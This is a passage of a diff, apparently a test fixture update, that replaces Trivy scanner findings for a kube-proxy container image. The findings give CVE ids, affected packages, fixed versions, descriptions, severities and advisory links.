"https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-33", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5538-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5200", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", + "name": "libtirpc: DoS vulnerability with lots of connections", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-33", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5538-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5200", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202305-15", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202107-48", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + }, + { + "type": "URL", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libxtables12", "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": 